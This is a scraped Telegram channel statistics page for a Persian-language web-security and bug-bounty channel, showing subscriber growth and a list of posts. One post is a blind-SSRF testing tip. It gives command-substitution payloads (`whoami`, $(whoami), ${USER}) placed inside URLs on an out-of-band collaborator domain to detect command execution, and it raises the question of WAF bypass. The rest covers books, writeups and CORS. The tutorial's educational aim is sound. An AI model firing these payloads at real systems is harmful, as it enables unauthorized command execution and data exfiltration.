ar
Feedback
🕸 Articles

🕸 Articles

الذهاب إلى القناة على Telegram

Web Security Researcher, Bug Hunter 369

إظهار المزيد
416
المشتركون
لا توجد بيانات24 ساعات
+127 أيام
+7730 أيام

جاري تحميل البيانات...

القنوات المماثلة
لا توجد بيانات
هل تواجه مشاكل؟ يرجى تحديث الصفحة أو الاتصال بمدير الدعم الخاص بنا.
الإشارات الواردة والصادرة
---
---
---
---
---
---
جذب المشتركين
مايو '25
مايو '25
+83
في 1 قنوات
أبريل '25
+347
في 3 قنوات
التاريخ
نمو المشتركين
الإشارات
القنوات
30 مايو0
29 مايو+1
28 مايو+2
27 مايو+1
26 مايو+1
25 مايو+6
24 مايو+1
23 مايو0
22 مايو+1
21 مايو0
20 مايو+2
19 مايو+1
18 مايو0
17 مايو+3
16 مايو+3
15 مايو+1
14 مايو+4
13 مايو+4
12 مايو+10
11 مايو+1
10 مايو0
09 مايو+2
08 مايو+2
07 مايو0
06 مايو+6
05 مايو+7
04 مايو+12
03 مايو+3
02 مايو+5
01 مايو+4
منشورات القناة
توی تست های blind ssrf شما جواب رو به صورت مستقیم نمی‌تونید ببینید باید از یه سرویس out of band کمک بگیرید تا بفهمید آیا سرور درخواست شما رو اجرا کرده یا نه. برای دریافت پاسخ های out of band میتونید از
https://app.interactsh.com
استفاده کنید. این سه تا دستور رو توی تست های blind ssrf بیارید. می‌تونید باهاش دستورات سیستم عاملی اجرا کنید. Text Payloads:
`whoami`
$(whoami)
${USER}
در نهایت باید پیلودتون شبیه به این باشه Text Payloads:
https://`whoami`.wovpawxjsgngqywkn[.]oast[.]fun
https://$(whoami).wovpawxjsgngqywkn.oast.fun
https://${USER}.wovpawxjsgngqywkn.oast.fun
کافیه این آدرس رو توی هر ورودی که مشکوک به ssrf هست بزنید و منتظر باشید در صورت آسیب پذیر بودن پاسخ توی داشبورد interactsh نمایش داده بشه حالا یه سوال اگر waf به کلمه whoami یا کاراکتر هایی که داره باهاش ارسال میشه حساس باشه و درخواست رو بلاک کنه راهی برای دور زدنش هست؟

2
چرا باید رایتاپ بخونیم؟ خوندن ۵۰ تا رایتاپ مثل اینه که ۵۰ هکر حرفه‌ای رو دعوت کنی کنار دستت بشینن و هر کدوم ذهنشون رو جلوت باز کنن. با هر رایتاپ، یه تیکه از درک و تجربه‌شون رو برمی‌داری و به روش خودت اضافه می‌کنی. نتیجه؟ چشمای تربیت‌شده‌ای که جزئیاتی رو می‌بینه که قبلاً هرگز به چشم نمی‌اومد و این دقیقاً همون چیزیه که یه باگ‌هانتر حرفه‌ای رو از بقیه جدا می‌کنه.
341
3
بعدی چی باشه؟
348
4
Author: zarvan Language: Persian Telegram channel: @web_articles
412
5
لا يوجد نص...
375
6
آخ یه نفر لفت داد
353
7
آخ یه نفر لفت داد
1
8
+3
لا يوجد نص...
368
9
Author: zarvan Language: Persian Telegram channel: @web_articles
688
10
برش هایی از کتاب+3
برش هایی از کتاب
526
11
درود امیدوارم حالتون خوب باشه همونطور که میدونید یکی از کتاب هایی که توی رودمپ یاد گیری وب هکینگ هست مخصوصا توصیه شده برای هانتر‌ها کتاب Real-World Bug Hunting _ Peter Yaworski هست. بعد از مدتی این کتاب رو بلاخره آماده کردم میخواستم چاپش کنم ولی خب بنا به دلایلی نشد که علتش رو هم توی کتاب توضیح دادم. امیدوارم این کتاب مفید باشه براتون.
455
12
10. Miane Ghamhayam (Ft. Fadaei).mp3
436
13
Author: zarvan Language: Persian Telegram channel: @web_articles
605
14
لا يوجد نص...
536
15
لا يوجد نص...
427
16
سلام بچه ها امیدوارم حالتون خوب باشه مفاهیم اولیه امنیت وب به نظرتون شامل چه چیزایی میشه؟ ممنون میشم همین زیر هر چیزی که فکر میکنید یه نفر باید برای یادگیری امنیت وب اپلیکیشن ها بلد باشه بهم بگین. به عنوان مثال: اینترنت چیه و چجوری کار می‌کنه؟ وب چطوری کار می‌کنه؟ Request/Response چیه؟ Cookie, Session, Storage چطور کار می‌کنن؟ مرورگر چطور رندر می‌کنه صفحات رو؟
506
17
Author: zarvan Language: Persian Telegram channel: @web_articles
2 105
18
خب coming soon کافیه دیگه سومین آسیب پذیری که بهش پرداختم CORS Misconfigoration هست. اول از همه گفتیم cors چیه؟ چطوری کار میکنه؟ چطوری پیاده سازی میشه؟ و در نهایت چه آسیب پذیری هایی داره
633
19
coming soon...
coming soon...
578
20
https://t.me/GitBook_s
165